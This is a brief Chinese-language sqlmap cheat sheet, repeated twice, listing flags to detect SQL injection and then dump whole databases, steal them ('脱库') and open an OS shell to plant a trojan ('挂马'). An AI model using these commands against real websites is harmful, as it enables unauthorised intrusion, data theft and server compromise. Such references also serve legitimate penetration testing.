1、判断网站是否存在注入
get:sqlmap -u “url”
post:sqlmap -r “请求数据包”
2、爆数据库
当前数据库 --current-db
线程 --thread (1-10)
爆所有库 --dbs
指定库 -D
爆所有表 --tables
指定表 -T
爆所有列 --columns
指定列 -C
显示内容 --dump
脱库 --dump-all
挂马 --os-shell
1、判断网站是否存在注入
get:sqlmap -u “url”
post:sqlmap -r “请求数据包”
2、爆数据库
当前数据库 --current-db
线程 --thread (1-10)
爆所有库 --dbs
指定库 -D
爆所有表 --tables
指定表 -T
爆所有列 --columns
指定列 -C
显示内容 --dump
脱库 --dump-all
挂马 --os-shell